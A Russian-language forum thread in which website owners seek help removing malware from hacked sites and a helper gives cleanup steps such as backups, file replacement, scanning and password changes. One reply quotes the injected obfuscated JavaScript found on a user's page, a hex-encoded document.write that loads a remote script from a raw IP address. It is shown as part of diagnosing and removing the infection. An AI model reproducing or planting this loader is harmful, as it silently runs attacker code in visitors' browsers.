Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
raveal-2 написал(а):
К сожалению САППОРТ не может мне предоставить доступ к админ панели, мотивируя тем, что он заражен вирусом.
Нажмите для раскрытия...
Я Вам больше скажу, он в принципе не должен был этого делать. Судя по картинкам, у Вас етсь доступ до Панели управления хостингом и доя Управлением БД. В интернете есть инструкции как восстановить доступ к WP через БД,
 
Через панель своего хостинга wp-content/plugins/ я отключил все плагины (_29 шт) сайта хттп://dohodnoemecto.r путем их переименования.
Сайт по-прежнему не открывается и показывает тот код, который я показывал в своем сообщении от
26 Июн 2018
Список применяемых плагинов на сайте прилагаю
 
Последнее редактирование модератором:
Для начало можно сделать резервную копию сайта, полный бэкап всех файлов и БД сохранить. Дальше восстановить резервную копию если такова имеется на момент работоспособности сайта.
После чего сменить пароли от хостинга и фтп возможно БД.

Когда копию восстановить сайт запустить, зайти в панель управления сайтом отключить или удалить плагины. Провести аудит безопасности сайта.

Так же рекомендую все таки нанять специалиста.
 
@raveal-2, вам там прямым тектом пишет, что ошибка из-за файла admin-header.php

и список плагинов лучше удалите из своего поста.
 
Последнее редактирование модератором:
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл admin-header.php, на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
 
akok написал(а):
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
Нажмите для раскрытия...
Привет АКОК!
Я сделал бэкап, подготовил чистый архив и вставил чистый файл admin-header.php , переименовал старый файл
dmin-header.php

Теперь, если позволите, пару вопросов дилетанта:
-Мне теперь, для того чтобы проверить работу сайта опять нужно закачать на хостинг этот бэкап с чистым файлом?
-Если "да", то как это сделать? Нужно ли предварительно использовать сканер Ai-Bolit?
-Как проверить наличие левых пользователей?
Спасибо
 
После подготовки резервной копии, нужно было менять файл на самом хостинге, а не в бекапе. Бекап на случай "все пропало". Если сайт запустится, то воспользуйтесь Ai-Bolit, если нет. То тут только переустановка. Не забывайте о бекапе.
 
Здравствуйте.
Avast информирует о зараженной индексной странице сайта х ттр://dohodtut.ru
На остальные страницы сайта Avast не реагирует.
Например - х ттр://dohodtut.ru/index.html или х ттр://dohodtut.ru/MLM_v_%202raza.html
Как данный вирус удалить? Спасибо за ответ
 

Вложения

  • 1.webp
    1.webp
    19.6 KB · Просмотры: 130
1. Главная сейчас ничего не отдает, белая страница

2. С dohodtut.ru/index.htm был редирект на start.parimatch.com

В коде
HTML: 
<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script>

Описание WordPress Hacks: jQuery JS script injection :: Cybersecurity blog :: www.polaris64.net
 
@akok, Редирект можно как-то удалить?
Теперь и х ттр:// dohodtut.ru/index.htm ничего не отдает, белая страница...
Как исправить? Поможет ли предоставление кода главной страницы?
 
raveal-2 написал(а):
Редирект можно как-то удалить?
Нажмите для раскрытия...
отредактировать страницу и убрать вставку в моем предыдущем посте.

С белой страницей, смотрите в настройки хостинга/скрипта или наймите администратора на часок.
и/или закажите лечение на стороннем сервисе (например: Вылечить сайт от вирусов.)
 
Здравствуйте!
Помогите, пожалуйста, с сайтом хттп://belmetall.by
В search console индексируются тысячи страниц, сгенерированных явно вирусом.
site: выдает чего-то с японскими иероглифами... Восстановил бэкап, удалил ненужные расширения, но ситуация с индексацией не поменялась.
Что можно сделать, помогите!!!
 
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии

После заказать удаление каталогов (они выдают сейчас 404 ошибку)

Инструмент удаления URL и Безопасный поиск - Cправка - Search Console

Как временно удалить свои страницы из Google и посмотреть результаты, отфильтрованные Безопасным поискомИнструмент удаления URL позволяет владельцу сайта временно исключить некоторые страницы из резул
support.google.com

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
 
akok написал(а):
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии
После заказать удаление каталогов (они выдают сейчас 404 ошибку)

Инструмент удаления URL и Безопасный поиск - Cправка - Search Console

Как временно удалить свои страницы из Google и посмотреть результаты, отфильтрованные Безопасным поискомИнструмент удаления URL позволяет владельцу сайта временно исключить некоторые страницы из резул
support.google.com

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
Нажмите для раскрытия...
Спасибо большое за ответ!
Конечно же, 1,2 были сделаны.
Меня беспокоит то, что всё это проделано уже 2 недели назад, а страницы эти по прежнему в индексе, меньше не становиться.
Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Удалять страницы гугловским инструментом наверное не реально, их же тысячи, как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Не могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?
Спасибо заранее!
 
Serge написал(а):
уже 2 недели назад
Нажмите для раскрытия...
Удаление будет только тогда когда бот их заново проиндексирует, а это занимает месяца.

Serge написал(а):
Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Нажмите для раскрытия...
Сейчас признаков взлома нет, отслеживайте метрики в консоли, если количество спам-страниц будет расти, то значит не все обновили.



Serge написал(а):
е могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?
Нажмите для раскрытия...

Как сделать 301-редирект в htaccess, как настроить правильный 301 редирект для сайта

Как быстро настроить 301-редирект на сайте через файл .htaccess? Много примеров использования, готовые шаблоны и подробный мануал.
pixelplus.ru pixelplus.ru

.htaccess Generator - Help creating your htaccess file

Quickly generate an htaccess file for many functions including www rewrite, hotlink prevention, custom error pages, caching, and redirects.
www.htaccessredirect.net www.htaccessredirect.net

Если конечно используете Apache
Serge написал(а):
как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Нажмите для раскрытия...
Раньше можно было удалять каталоги, но смотрю форму поменяли.

О Yandex вебматере не забывайте.
 

Похожие темы

N
сайт рухнул в поиске, помогите проверить на вредоносное по
Ответы
7
Просмотры
2K
akok
akok
magirus
  • Закрыта
прошу проверить сайт kazus.ru
Ответы
2
Просмотры
3K
magirus
magirus
BLO100
  • Закрыта
Прошу проверить сайт mafcup.ucoz.ru/
Ответы
5
Просмотры
3K
akok
akok
Назад
Сверху Снизу